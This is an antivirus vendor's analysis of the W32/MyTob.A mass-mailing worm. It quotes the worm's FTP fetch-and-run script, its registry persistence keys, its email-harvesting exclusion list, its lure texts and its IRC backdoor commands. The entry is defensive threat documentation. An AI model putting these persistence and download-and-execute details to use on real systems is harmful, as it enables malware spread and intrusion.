W32/MyTob.A@mm
Analysis
This virus is coded using Visual C, and contains instructions to spread to
other systems using these methods -
- SMTP email
- networked systems
- MSNSS exploit [MS04-011]
The virus also has the following characteristics -
- has a built-in FTP daemon with the reference
name "StnyFtpd", and may serve the file "bingoo.exe" via
the FTP daemon
- may connect to the IRC server named "irc.blackcarder.net" and
await commands from a malicious user
The virus borrows code from W32/Mydoom - this causes some AV scanners to identify this virus as a variant of the W32/Mydoom family.
Loading at Windows startup
If the threat is run manually, it will copy itself to the local system -
C:\WINNT\system32\msnmsgr.exe
The virus has a file size in excess of 120,000 bytes. The virus will register itself to load at Windows startup -
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
"MSN" = msnmsgr.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
"MSN" = msnmsgr.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
"MSN" = msnmsgr.exeHKEY_CURRENT_USER\Software\Microsoft\OLE
"MSN" = msnmsgr.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole
"MSN" = msnmsgr.exeHKEY_CURRENT_USER\SYSTEM\CurrentControlSet\Control\MSN
"MSN" = msnmsgr.exe
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MSN
"MSN" = msnmsgr.exe
SMTP mass-mailing routine
The virus has instructions to send a copy of itself to contacts found in files
of certain extensions. This virus appears to have borrowed the same harvest
and exclusion routines as found in the W32/Mydoom virus family. Email addresses
are sampled from files having these extensions -
- adb
- asp
- dbx
- htm
- php
- pl
- sht
- tbb
- wab
The captured addresses are used as targets for the mailing routine. As with other viruses using this technique, the virus will avoid selecting email addresses containing certain strings, such as these -
- -._!
- -._!@
- .edu
- .gov
- .mil
- abuse
- accoun
- acketst
- admin
- anyone
- arin.
- avp
- be_loyal:
- berkeley
- borlan
- bsd
- bugs
- ca
- certific
- contact
- example
- fcnz
- feste
- fido
- foo.
- fsf.
- gnu
- gold-certs
- gov.
- help
- hotmail
- iana
- ibm.com
- icrosof
- icrosoft
- ietf
- info
- inpris
- isc.o
- isi.e
- kernel
- linux
- listserv
- math
- me
- mit.e
- mozilla
- msn.
- mydomai
- no
- nobody
- nodomai
- noone
- not
- nothing
- ntivi
- page
- panda
- pgp
- postmaster
- privacy
- rating
- rfc-ed
- ripe.
- root
- ruslis
- samples
- secur
- sendmail
- service
- site
- soft
- somebody
- someone
- sopho
- spm
- submit
- support
- syma
- tanford.e
- the.bat
- unix
- usenet
- utgers.ed
- webmaster
- www
- you
- your
The virus carries hard-coded message bodies and sends email with varying body text. The possible body text are selected from these choices -
- Mail transaction failed. Partial message is available.
- The message contains Uniccharacters and has been sent as a binary attachment.
- The message cannot be represented in 7-bit ASCII encoding and has been sent as a binary attachment.
- test
The email attachment may have one of these names as a prefix, and may have a .BAT, .CMD, .PIF, .EXE, SCR, or .ZIP file extension -
- body
- message
- test
- data
- file
- text
- doc
- readme
- document
Network spreading routine
The virus will first bind with a high TCP port such as 36276. The virus will
spawn a thread that functions on this TCP port as an FTP server. The server
responds with this detail, if connected to a logon instance -
220 StnyFtpd 0wns j0
When exiting the server, it responds with this string -
221 Goodbye happy r00ting.
Next, the virus will attempt to connect with systems on the same Class A subnet
as the infected system. The virus generates random IP addresses based on the
infected system IP address, and spans across randomly selected Class B and Class
C addresses.
For example, if the infected system has an IP address of 192.168.29.56 [using
network address translation, or NAT], the virus may try to connect with random
addresses such as these -
- 192.168.1.71
- 192.168.113.2
- 192.168.44.50 and so on
The virus attempts to connect with the random system using TCP port 445. If a connection can be made, the virus uses an MSNSS buffer overflow exploit to gain access to the system. Once access is obtained, the virus generates an FTP script and writes it to the system with these instructions:
open undefineds undefinedd
user 1 l
get bling.exe
quit
ftp -n -s:o
bling.exe
The virus then initiates FTP.EXE locally on the compromised system to retrieve a copy of the virus as "bling.exe" from the connecting system, and execute it.
Backdoor functionality
The virus will create a thread that functions as a backdoor, using a high TCP
port such as 24141. The virus connects with the IRC server 'irc.blackcarder.net'
in order to receive instructions from a malicious user. Instructions include
some of the following -
.update
.raw
.exec
.dl
.rm
.quit
.su
.uptim
.login
Recommended Action
- check the main screen using the web interface to ensure the latest AV/NIDS database has been downloaded and installed -- if required, enable the "Allow Push Update" option
FortiGate systems:
Telemetry
Detection Availability
FortiGate | |
---|---|
Extreme | |
FortiClient | |
Extended | |
FortiMail | |
Extended | |
FortiSandbox | |
Extended | |
FortiWeb | |
Extended | |
Web Application Firewall | |
Extended | |
FortiIsolator | |
Extended | |
FortiDeceptor | |
Extended | |
FortiEDR |